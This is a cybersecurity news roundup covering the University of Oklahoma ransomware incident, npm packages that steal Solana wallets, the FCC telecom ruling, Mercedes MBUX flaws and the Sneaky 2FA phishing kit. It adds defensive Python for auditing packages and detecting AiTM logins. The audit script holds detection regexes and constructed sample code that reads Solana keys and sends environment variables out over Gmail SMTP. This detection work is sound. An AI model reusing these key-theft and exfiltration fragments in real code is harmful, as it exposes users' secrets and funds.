Canary Trap’s Bi-Weekly Cyber Roundup
Welcome to Canary Trap’s “Bi-Weekly Cyber Roundup”. At Canary Trap, it is our mission to keep you up-to-date with the most crucial news in the world of cybersecurity, and this bi-weekly publication is your gateway to the latest news.
This week’s round-up highlights critical developments across the cybersecurity landscape. From a university’s swift response to unusual network activity to hackers leveraging npm packages to target Solana wallets, the threat environment continues to evolve. We also examine the FCC’s response to telecom hacking linked to China, vulnerabilities identified in Mercedes-Benz infotainment systems, and a sophisticated phishing kit targeting Microsoft 365 accounts via Telegram. Stay informed with these in-depth analyses of the latest security challenges and trends.
- University of Oklahoma Isolates Systems After ‘Unusual Activity’ on IT Network
The University of Oklahoma has reported unusual cyber activity on its IT network and is taking measures to address the situation. The university, which serves over 34,000 students, appeared on the leak site of a ransomware group earlier last week. The group claims to have stolen 91 MB of sensitive data, allegedly including employee records, financial information, and other details.
In a statement, a university spokesperson confirmed the discovery of the activity: “The University recently identified unusual activity on our IT network. Upon discovery, we isolated certain systems and are investigating the matter. As part of this ongoing process, measures are being implemented across our network.” No further details were provided regarding the cause of the incident, the systems affected, or whether a ransom might be paid.
The timing of the incident coincided with the first official day of the new semester. Just days earlier, a snowstorm forced the campus to close and staff to work remotely, which may have contributed to the vulnerability.
The ransomware group behind the attack, known as Fog, has a history of targeting higher education institutions. Emerging in May 2024, the group has focused predominantly on U.S.-based organizations, with 80% of its victims in the education sector. Arctic Wolf researchers noted that Fog often exploits compromised VPN credentials to gain unauthorized access to networks. Their investigations revealed that these attacks utilized credentials associated with two different VPN gateway vendors.
Large universities, including the University of Oklahoma, are particularly susceptible to ransomware attacks during holidays or other periods when IT staff are stretched thin. Similar incidents have affected other major institutions, such as Stanford University and the University of Michigan, which were forced to take portions of their networks offline following ransomware infections.
The situation underscores the growing risk ransomware groups pose to the education sector, especially during times of operational disruption.
- Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP
Cybersecurity researchers have uncovered three separate clusters of malicious packages hosted on the npm and Python Package Index (PyPI) repositories. These packages are designed to exfiltrate sensitive data and, in some cases, delete files on infected systems.
Supply chain security firm Socket identified four npm packages that target Solana cryptocurrency wallets. These packages are falsely advertised as Solana-specific tools but are engineered to intercept Solana private keys and transfer up to 98% of wallet funds to an attacker-controlled address.
The exfiltration is achieved using Gmail’s SMTP servers, leveraging Gmail’s trusted status to evade detection by firewalls and endpoint security tools. The attackers also maintained GitHub repositories that claimed to offer Solana development tools but instead imported the malicious npm packages. These repositories, linked to accounts like “moonshot-wif-hwan” and “Diveinprogramming,” have since been removed.
Malicious npm packages can take the threat further by including a “kill switch” function. This functionality repeatedly deletes files in project-specific directories and, in some instances, exfiltrates environment variables to a remote server.
Beyond npm and PyPI, attackers are also exploiting developers in the Roblox community by distributing fraudulent libraries to steal data. These libraries, often based on open-source stealer malware like Skuld and Blank-Grabber, target users seeking game cheats and mods.
These discoveries underscore the importance of rigorous security measures in the software supply chain, particularly for developers using open-source libraries. Verifying the authenticity of packages, avoiding suspicious repositories, and monitoring project dependencies are crucial steps in mitigating risks posed by malicious software.
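As an added illustration of the dependency monitoring recommended above (example code written for this roundup, not Socket's tooling), the following triage script flags installed npm packages that combine an install-time lifecycle hook with the behaviours described in this story: Gmail SMTP exfiltration, Solana key access, environment harvesting and a file-deleting kill switch. The indicator regexes and the sample packages are constructed assumptions for the example; a hit is a reason to review a package, not proof that it is malicious.

```python
import re

# Indicator patterns drawn from the behaviours described in the story above.
# These regexes are this example's own assumptions, not Socket's detection
# rules, and they are triage heuristics rather than proof of malice.
INDICATORS = {
    "gmail_smtp": re.compile(r"smtp\.gmail\.com|nodemailer"),
    "solana_keys": re.compile(r"Keypair\.fromSecretKey|secretKey|\.config/solana"),
    "env_harvest": re.compile(r"JSON\.stringify\(process\.env\)"),
    "kill_switch": re.compile(r"fs\.rm(?:Sync)?\(|rimraf"),
}
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

def audit_package(manifest, sources):
    """Return (severity, findings) for one installed package.

    manifest: parsed package.json; sources: {filename: contents}.
    'high' when an install-time hook is combined with a network, key or
    environment indicator, 'medium' for indicators alone, else 'clean'."""
    findings = []
    hooks = [h for h in LIFECYCLE_HOOKS if h in manifest.get("scripts", {})]
    if hooks:
        findings.append("lifecycle hook: " + ", ".join(hooks))
    hits = set()
    for fname, code in sources.items():
        for label, rx in INDICATORS.items():
            if rx.search(code):
                hits.add(label)
                findings.append(f"{label} in {fname}")
    if hooks and hits & {"gmail_smtp", "solana_keys", "env_harvest"}:
        return "high", findings
    if hits:
        return "medium", findings
    return "clean", findings

# Constructed sample packages with hypothetical names and fragmentary,
# non-functional sources; they exist only to exercise the heuristics.
SAMPLE_PACKAGES = {
    "example-pad-lib": ({"name": "example-pad-lib", "version": "1.0.0"},
                        {"index.js": "module.exports = (s, n) => s.padStart(n);"}),
    "example-solana-helper-pkg": (
        {"name": "example-solana-helper-pkg", "version": "0.3.1",
         "scripts": {"postinstall": "node setup.js"}},
        {"setup.js": 'const nodemailer = require("nodemailer");\n'
                     'const kp = Keypair.fromSecretKey(read(".config/solana/id.json"));\n'
                     'send({host: "smtp.gmail.com"}, JSON.stringify(process.env));',
         "clean.js": 'fs.rmSync("src", {recursive: true});'}),
}

def audit_all(packages=SAMPLE_PACKAGES):
    """Audit every package and map its name to (severity, findings)."""
    return {name: audit_package(m, s) for name, (m, s) in packages.items()}
```

In practice the manifest and sources would be read from each directory under node_modules after `npm ci`, before the project is built or run.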
- FCC Taking Action in Response to China’s Telecoms Hacking
The Federal Communications Commission (FCC) has issued a declaratory ruling mandating that telecommunications providers enhance their network security to address cybersecurity threats. The ruling, now open for public comment, also requires wireless carriers to annually certify that they have a cybersecurity risk management plan in place.
The FCC emphasized the urgency of protecting communications infrastructure, citing national security and public safety concerns. “The federal government must ensure communication systems remain operational for critical missions under any circumstances,” the agency stated. This decision follows cyberattacks attributed to Salt Typhoon, a Chinese state-sponsored threat actor, which targeted at least nine U.S. wireless carriers. The FCC highlighted that successful attacks on telecom networks could severely impact other critical infrastructure sectors, as these rely on secure communications for their operations.
Under the ruling, Section 105 of the Communications Assistance for Law Enforcement Act (CALEA), enacted in 1994, is interpreted to require telecom carriers, including broadband and VoIP providers, to secure their networks against unauthorized access or interception. Previously, the FCC ruled that carriers must prevent untrusted equipment suppliers from enabling illegal interceptions. The updated ruling broadens these responsibilities to include overall network management. “We reaffirm that Section 105 of CALEA obligates carriers to prevent unauthorized interception and access to call-identifying information, whether by law enforcement or other parties,” the FCC noted.
Additionally, the ruling proposes expanded cybersecurity and supply chain risk management requirements for various service providers, including broadcasters, cable and satellite operators, VoIP providers, and 911/988 service providers. Entities will need to implement cybersecurity plans aligned with NIST standards, ensuring the confidentiality, integrity, and availability of their systems. Senior executives will be required to endorse these plans.
The declaratory ruling is effective immediately, with the comment period closing 30 days after its publication in the Federal Register. This initiative underscores the FCC’s commitment to bolstering the resilience of U.S. telecommunications networks against evolving cybersecurity threats.
- Details Disclosed for Mercedes-Benz Infotainment Vulnerabilities
Kaspersky has revealed information about multiple vulnerabilities found in the Mercedes-Benz infotainment system, specifically the Mercedes-Benz User Experience (MBUX) head unit. The company has assured customers that these security issues have been addressed and are not easily exploitable.
Kaspersky’s findings build upon earlier research by a Chinese research team from 2021, with the Russian cybersecurity firm publishing the details in a blog post on Friday. The study focused on the first-generation MBUX system, identifying various flaws that could be used for denial-of-service (DoS) attacks, data extraction, command injection, and privilege escalation.
Some of the vulnerabilities could allow an attacker with physical access to the vehicle to disable anti-theft protections, alter vehicle settings, or unlock paid features, using USB or custom UPC connections. These vulnerabilities have been assigned CVE identifiers for 2023 and 2024. However, Mercedes-Benz confirmed to SecurityWeek that it was aware of these issues since 2022.
A company spokesperson explained, “In August 2022, external researchers informed us about potential issues with the first-generation MBUX. These vulnerabilities require physical access to the vehicle and the removal and opening of the head unit. Newer versions of the system are not affected.”
Mercedes-Benz emphasized that security is a high priority for the company and encouraged researchers to report vulnerabilities through its official disclosure program. In the past, some vulnerabilities have raised concerns about the potential for remote hacks of Mercedes-Benz vehicles, as well as issues related to the company’s IT infrastructure.
- Telegram-Based “Sneaky 2FA” Phishing Kit Targets Microsoft 365 Accounts
In December 2024, cybersecurity researchers at Sekoia.io identified a new Adversary-in-the-Middle (AiTM) phishing kit targeting Microsoft 365 accounts. Dubbed Sneaky 2FA, this kit has been active since at least October 2024, as confirmed by telemetry data, and is marketed as a Phishing-as-a-Service (PhaaS) solution through the Telegram-based service “Sneaky Log.”
Sneaky 2FA allows its users—typically cybercriminals—to deploy phishing pages using licensed and obfuscated source code. These phishing pages are often hosted on compromised WordPress websites or attacker-controlled domains. A key feature is the use of URL patterns that prefill phishing pages with victims’ email addresses for a more seamless attack. The kit is linked to elements from the W3LL Panel OV6, an older AiTM phishing framework, indicating a shared lineage or influence within the cybercriminal ecosystem.
Sneaky 2FA employs various tactics to bypass security measures:
Dynamic URL Patterns: Attackers generate phishing links with complex, trackable structures such as “mysilverfox.commy/00/#victimexamplecom.”
Anti-Bot Features: Cloudflare Turnstile challenges filter out bots and security scanners, allowing the phishing page to target human users effectively.
Obfuscation: HTML and JavaScript are heavily obfuscated, and text is often embedded as images to evade detection.
Anti-Debugging Mechanisms: The phishing pages use techniques to prevent analysis via browser developer tools.
The “Sneaky Log” Telegram bot serves as a central hub for purchasing the phishing kit, managing subscriptions, and providing support. Payments are accepted in cryptocurrencies like Bitcoin and Ethereum, with signs of potential money laundering activities through layered transactions.
Organizations can detect Sneaky 2FA campaigns by analyzing logs for anomalies, such as inconsistent User-Agent strings during authentication, which may indicate malicious activity. Tracking phishing URLs and domain registrations also offers a way to identify and disrupt campaigns.
The adoption of phishing-resistant authentication methods like FIDO2/WebAuthn, real-time URL scanning that bypasses evasion tactics, and proactive monitoring of domain registrations are recommended to mitigate the risk.
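The log-based detection suggested above, as an added example that is not part of the original roundup or Sekoia's research: an AiTM relay completes parts of the sign-in flow from its own infrastructure, so the password, MFA and token steps of one authentication can arrive with different User-Agent strings or source IPs. The field names and the sample events below are constructed assumptions loosely modelled on Entra ID sign-in logs.

```python
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample of Microsoft 365 sign-in events (not real telemetry).
# Field names are an assumption, loosely modelled on Entra ID sign-in logs:
# one correlation id ties the password, MFA and token steps together.
SAMPLE_LOG = """\
{"time":"2025-01-15T09:00:01Z","user":"alice@example.com","correlation":"c1","step":"password","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/131.0","ip":"203.0.113.10"}
{"time":"2025-01-15T09:00:04Z","user":"alice@example.com","correlation":"c1","step":"mfa","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/131.0","ip":"203.0.113.10"}
{"time":"2025-01-15T09:00:06Z","user":"alice@example.com","correlation":"c1","step":"token","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/131.0","ip":"203.0.113.10"}
{"time":"2025-01-15T09:12:10Z","user":"bob@example.com","correlation":"c2","step":"password","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/131.0","ip":"198.51.100.7"}
{"time":"2025-01-15T09:12:13Z","user":"bob@example.com","correlation":"c2","step":"mfa","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/131.0","ip":"198.51.100.7"}
{"time":"2025-01-15T09:12:15Z","user":"bob@example.com","correlation":"c2","step":"token","ua":"Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0","ip":"192.0.2.44"}
"""

def parse_events(text):
    """Parse newline-delimited JSON sign-in events, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["time"] = datetime.fromisoformat(ev["time"].replace("Z", "+00:00"))
            events.append(ev)
    return events

def find_inconsistent_flows(events, window_s=300):
    """Return one alert per authentication flow whose steps completed within
    window_s seconds yet arrived with differing User-Agent strings or source
    IPs, the trace an AiTM relay leaves in front of the real login page."""
    flows = defaultdict(list)
    for ev in events:
        flows[(ev["user"], ev["correlation"])].append(ev)
    alerts = []
    for (user, corr), steps in flows.items():
        steps.sort(key=lambda e: e["time"])
        if (steps[-1]["time"] - steps[0]["time"]).total_seconds() > window_s:
            continue  # slow flows are more likely legitimate re-authentication
        reasons = []
        if len({e["ua"] for e in steps}) > 1:
            reasons.append("user_agent_changed")
        if len({e["ip"] for e in steps}) > 1:
            reasons.append("ip_changed")
        if reasons:
            alerts.append({"user": user, "correlation": corr, "reasons": reasons,
                           "steps": [e["step"] for e in steps]})
    return alerts
```

A flagged flow is a lead for incident response (revoke sessions, reset credentials, check for new MFA methods), not a verdict on its own, since VPN roaming and browser updates can also change these fields.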
References:
https://thehackernews.com/2025/01/hackers-deploy-malicious-npm-packages.html
https://www.securityweek.com/fcc-taking-action-in-response-to-chinas-telecoms-hacking/
https://www.securityweek.com/details-disclosed-for-mercedes-benz-infotainment-vulnerabilities/
https://hackread.com/telegram-sneaky-2fa-phishing-kit-microsoft-365-accounts/